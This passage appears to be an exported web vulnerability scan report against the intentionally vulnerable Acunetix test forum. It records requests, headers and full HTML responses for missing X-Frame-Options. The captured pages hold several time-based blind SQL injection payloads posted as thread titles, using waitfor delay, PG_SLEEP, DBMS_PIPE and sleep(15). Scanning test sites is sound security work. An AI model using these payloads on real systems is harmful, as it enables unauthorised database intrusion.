align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=50 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4234 |
Response Body - size: 4,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum NebDWBkM')); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/NebDWBkM')); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>NebDWBkM')); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=51 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4264 |
Response Body - size: 4,264 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=52 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4267 |
Response Body - size: 4,267 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=53 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4270 |
Response Body - size: 4,270 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=54 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4309 |
Response Body - size: 4,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:58 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=55 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4210 |
Response Body - size: 4,210 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum if(now()=sysdate(),sleep(15),0) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/if(now()=sysdate(),sleep(15),0) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:59 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>if(now()=sysdate(),sleep(15),0) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=56 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- 